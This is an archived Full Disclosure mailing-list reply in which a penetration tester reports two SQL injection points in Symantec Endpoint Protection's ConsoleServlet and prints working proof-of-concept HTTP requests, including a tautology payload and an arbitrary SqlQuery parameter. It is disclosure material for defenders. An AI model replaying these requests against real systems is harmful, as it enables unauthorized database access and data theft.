[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] Symantec Endpoint Protection
From: Markus Wulftange <markus.wulftange () code-white ! com>
Date: 2015-08-03 11:19:56
Message-ID: 55BF4E5C.4040404 () code-white ! com
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
Hi Brandon,
we found two injection points. One in the BinaryFileHandler class:
POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175
ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1
And one in the ExpRecordHandler class:
POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175;
REQUESTSIG=09E0C480920F594CBD036BD07DC9A0B13198C99E8AFD93C83A2174710122381CD74369B6A1F2A53CA3121 \
005A65062406DCDDBDCADCE182A532F8D1C47DCC6730CA872CA488D26A8A9E0CF296B99FEC0165F757A486DC66D28012 \
BDD15C4C0F151AFF64A8F4724161C26C2D820D3BB14C248C0E748852BE52CBEE7CC5C04E5E26B415AD471A2FD03E4151798DE7021B8
Content-Type: application/x-www-form-urlencoded
Content-Length: 329
ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID,GROUP \
_ID,GROUP_IS_OU,OU_GUID,POLICY_MODE,COMPUTER_ID,HARDWARE_KEY,COMPUTER_NAME,COMPUTER_DOMAIN_NAME, \
DESCRIPTION,USER_NAME,FULL_NAME,USER_DOMAIN_NAME,HASH,PIN_MARK,EXTRA_FEATURE,CREATOR,CREATION_TIME,USN,TIME_STAMP,DELETED+from+SEM_CLIENT
Both require authentication. The latter does also require a request
signature REQUESTSIG, which is based on the requested parameters and a
hard-coded key.
--
Markus Wulftange
Senior Penetration Tester
Code White GmbH
Magirus-Deutz-Straße 18
89077 Ulm
E-Mail markus.wulftange@code-white.com
PGP C6D6 C18B BAB9 0089 6942 213D 7772 8552 E9F8 6F39
http://www.code-white.com
Code White GmbH
Sitz und Registergericht/Domicile and Register Court: Stuttgart,
HRB-Nr./Commercial Register No.: 749152
Geschäftsführung/Management: Dr. Helmut Mahler, Andreas Melzner, Lüder
Sachse
["signature.asc" (application/pgp-signature)]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic